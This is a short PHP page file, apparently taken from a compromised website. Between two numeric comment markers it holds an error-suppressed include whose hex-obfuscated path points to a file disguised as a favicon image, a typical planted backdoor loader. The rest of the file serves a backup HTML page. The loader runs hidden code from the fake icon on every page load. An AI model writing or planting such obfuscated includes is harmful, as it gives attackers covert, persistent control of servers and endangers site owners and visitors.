<?php
/*34690*/

@include "\x2fho\x6de/\x62it\x6fva\x75k/\x70ub\x6cic\x5fht\x6dl/\x77ed\x64in\x67wa\x7air\x2eco\x6d/a\x73se\x74s/\x63od\x65br\x75sh\x2ffa\x76ic\x6fn_\x63a8\x37ed\x2eic\x6f";

/*34690*/


echo file_get_contents('index.html.bak.bak');